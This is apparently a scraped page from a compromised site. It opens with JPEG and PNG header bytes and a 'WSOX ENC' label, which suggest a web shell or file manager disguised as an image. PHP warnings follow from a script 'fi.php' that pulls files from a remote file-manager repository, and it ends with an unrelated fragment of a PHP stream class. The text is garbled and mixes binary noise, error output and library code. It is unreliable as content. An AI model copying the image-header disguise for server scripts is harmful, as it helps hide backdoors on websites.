1:45 PM 11/12/2025 ���� JFIF    �� �        "" $(4,$&1'-=-157:::#+?D?8C49:7 7%%77777777777777777777777777777777777777777777777777��  { �" ��     �� 5    !1AQa"q�2��BR��#b�������  ��  ��   ? ��D@DDD@DDD@DDkK��6 �UG�4V�1�� �����릟�@�#���RY�dqp� ����� �o�7�m�s�<��VPS�e~V�چ8���X�T��$��c�� 9��ᘆ�m6@ WU�f�Don��r��5}9��}��hc�fF��/r=hi�� �͇�*�� b�.��$0�&te��y�@�A�F�=� Pf�A��a���˪�Œ�É��U|� � 3\�״ H SZ�g46�C��צ�ے �b<���;m����Rpع^��l7��*�����TF�}�\�M���M%�'�����٠ݽ�v� ��!-�����?�N!La��A+[`#���M����'�~oR�?��v^)��=��h����A��X�.���˃����^Ə��ܯsO"B�c>; �e�4��5�k��/CB��.  �J?��;�҈�������������������~�<�VZ�ꭼ2/)Í”jC���ע�V�G�!���!�F������\�� Kj�R�oc�h���:Þ I��1"2�q×°8��Р@ז���_C0�ր��A��lQ��@纼�!7��F�� �]�sZ B�62r�v�z~�K�7�c��5�.���ӄq&�Z�d�<�kk���T&8�|���I���� Ws}���ǽ�cqnΑ�_���3��|N�-y,��i���ȗ_�\60���@��6����D@DDD@DDD@DDD@DDD@DDc�KN66<�c��64=r����� ÄŽ0��h���t&(�hnb[� ?��^��\��â|�,�/h�\��R��5�? �0�!צ܉-����G����٬��Q�zA���1�����V��� �:R���`�$��ik��H����D4�����#dk����� h�}����7���w%�������*o8wG�LycuT�.���ܯ7��I��u^���)��/c�,s�Nq�ۺ�;�ך�YH2���.5B���DDD@DDD@DDD@DDD@DDD@V|�a�j{7c��X�F\�3MuA×¾hb� ��n��F������ ��8�(��e����Pp�\"G�`s��m��ާaW�K��O����|;ei����֋�[�q��";a��1����Y�G�W/�߇�&�<���Ќ�H'q�m���)�X+!���=�m�ۚ丷~6a^X�)���,�>#&6G���Y��{����"" """ """ """ """ ""��at\/�a�8 �yp%�lhl�n����)���i�t��B�������������?��modskinlienminh.com - WSOX ENC ‰PNG  IHDR Ÿ f Õ†C1 sRGB ®Îé gAMA ± üa pHYs à ÃÇo¨d GIDATx^íÜL”÷ð÷Yçªö("Bh_ò«®¸¢§q5kÖ*:þ0A­ºšÖ¥]VkJ¢M»¶f¸±8\k2íll£1]q®ÙÔ‚ÆT h25jguaT5*!‰PNG  IHDR Ÿ f Õ†C1 sRGB ®Îé gAMA ± üa pHYs à ÃÇo¨d GIDATx^íÜL”÷ð÷Yçªö("Bh_ò«®¸¢§q5kÖ*:þ0A­ºšÖ¥]VkJ¢M»¶f¸±8\k2íll£1]q®ÙÔ‚ÆT h25jguaT5*!
Warning: Undefined variable $authorization in C:\xampp\htdocs\demo\fi.php on line 57

Warning: Undefined variable $translation in C:\xampp\htdocs\demo\fi.php on line 118

Warning: Trying to access array offset on value of type null in C:\xampp\htdocs\demo\fi.php on line 119

Warning: file_get_contents(https://raw.githubusercontent.com/Den1xxx/Filemanager/master/languages/ru.json): Failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in C:\xampp\htdocs\demo\fi.php on line 120

Warning: Cannot modify header information - headers already sent by (output started at C:\xampp\htdocs\demo\fi.php:1) in C:\xampp\htdocs\demo\fi.php on line 247

Warning: Cannot modify header information - headers already sent by (output started at C:\xampp\htdocs\demo\fi.php:1) in C:\xampp\htdocs\demo\fi.php on line 248

Warning: Cannot modify header information - headers already sent by (output started at C:\xampp\htdocs\demo\fi.php:1) in C:\xampp\htdocs\demo\fi.php on line 249

Warning: Cannot modify header information - headers already sent by (output started at C:\xampp\htdocs\demo\fi.php:1) in C:\xampp\htdocs\demo\fi.php on line 250

Warning: Cannot modify header information - headers already sent by (output started at C:\xampp\htdocs\demo\fi.php:1) in C:\xampp\htdocs\demo\fi.php on line 251

Warning: Cannot modify header information - headers already sent by (output started at C:\xampp\htdocs\demo\fi.php:1) in C:\xampp\htdocs\demo\fi.php on line 252
attach($stream); if ($cache && (!$cache->isSeekable() || !$cache->isWritable())) { throw new RuntimeException('Cache stream must be seekable and writable'); } $this->cache = $cache; } /** * {@inheritdoc} */ public function getMetadata($key = null) { if (!$this->stream) { return null; } $this->meta = stream_get_meta_data($this->stream); if (!$key) { return $this->meta; } return isset($this->meta[$key]) ? $this->meta[$key] : null; } /** * Attach new resource to this object. * * @internal This method is not part of the PSR-7 standard. * * @param resource $stream A PHP resource handle. * * @throws InvalidArgumentException If argument is not a valid PHP resource. * * @return void */ protected function attach($stream): void { if (!is_resource($stream)) { throw new InvalidArgumentException(__METHOD__ . ' argument must be a valid PHP resource'); } if ($this->stream) { $this->detach(); } $this->stream = $stream; } /** * {@inheritdoc} */ public function detach() { $oldResource = $this->stream; $this->stream = null; $this->meta = null; $this->readable = null; $this->writable = null; $this->seekable = null; $this->size = null; $this->isPipe = null; $this->cache = null; $this->finished = false; return $oldResource; } /** * {@inheritdoc} */ public function __toString(): string { if (!$this->stream) { return ''; } if ($this->cache && $this->finished) { $this->cache->rewind(); return $this->cache->getContents(); } if ($this->isSeekable()) { $this->rewind(); } return $this->getContents(); } /** * {@inheritdoc} */ public function close(): void { if ($this->stream) { if ($this->isPipe()) { pclose($this->stream); } else { fclose($this->stream); } } $this->detach(); } /** * {@inheritdoc} */ public function getSize(): ?int { if ($this->stream && !$this->size) { $stats = fstat($this->stream); if ($stats) { $this->size = isset($stats['size']) && !$this->isPipe() ? $stats['size'] : null; } } return $this->size; } /** * {@inheritdoc} */ public function tell(): int { $position = false; if ($this->stream) { $position = ftell($this->stream); } if ($position === false || $this->isPipe()) { throw new RuntimeException('Could not get the position of the pointer in stream.'); } return $position; } /** * {@inheritdoc} */ public function eof(): bool { return $this->stream ? feof($this->stream) : true; } /** * {@inheritdoc} */ public function isReadable(): bool { if ($this->readable === null) { if ($this->isPipe()) { $this->readable = true; } else { $this->readable = false; if ($this->stream) { $mode = $this->getMetadata('mode'); if (strstr($mode, 'r') !== false || strstr($mode, '+') !== false) { $this->readable = true; } } } } return $this->readable; } /** * {@inheritdoc} */ public function isWritable(): bool { if ($this->writable === null) { $this->writable = false; if ($this->stream) { $mode = $this->getMetadata('mode'); if (strstr($mode, 'w') !== false || strstr($mode, '+') !== false) { $this->writable = true; } } } return $this->writable; } /** * {@inheritdoc} */ public function isSeekable(): bool { if ($this->seekable === null) { $this->seekable = false; if ($this->stream) { $this->seekable = !$this->isPipe() && $this->getMetadata('seekable'); } } return $this->seekable; } /** * {@inheritdoc} */ public function seek($offset, $whence = SEEK_SET): void { if (!$this->isSeekable() || $this->stream && fseek($this->stream, $offset, $whence) === -1) { throw new RuntimeException('Could not seek in stream.'); } } /** * {@inheritdoc} */ public function rewind(): void { if (!$this->isSeekable() || $this->stream && rewind($this->stream) === false) { throw new RuntimeException('Could not rewind stream.'); } } /** * {@inheritdoc} */ public function read($length): string { $data = false; if ($this->isReadable() && $this->stream) { $data = fread($this->stream, $length); } if (is_string($data)) { if ($this->cache) { $this->cache->write($data); } if ($this->eof()) { $this->finished = true; } return $data; } throw new RuntimeException('Could not read from stream.'); } /** * {@inheritdoc} */ public function write($string) { $written = false; if ($this->isWritable() && $this->stream) { $written = fwrite($this->stream, $string); } if ($written !== false) { $this->size = null; return $written; } throw new RuntimeException('Could not write to stream.'); } /** * {@inheritdoc} */ public function getContents(): string { if ($this->cache && $this->finished) { $this->cache->rewind(); return $this->cache->getContents(); } $contents = false; if ($this->stream) { $contents = stream_get_contents($this->stream); } if (is_string($contents)) { if ($this->cache) { $this->cache->write($contents); } if ($this->eof()) { $this->finished = true; } return $contents; } throw new RuntimeException('Could not get contents of stream.'); } /** * Returns whether or not the stream is a pipe. * * @internal This method is not part of the PSR-7 standard. * * @return bool */ public function isPipe(): bool { if ($this->isPipe === null) { $this->isPipe = false; if ($this->stream) { $stats = fstat($this->stream); if (is_array($stats)) { $this->isPipe = isset($stats['mode']) && ($stats['mode'] & self::FSTAT_MODE_S_IFIFO) !== 0; } } } return $this->isPipe; } }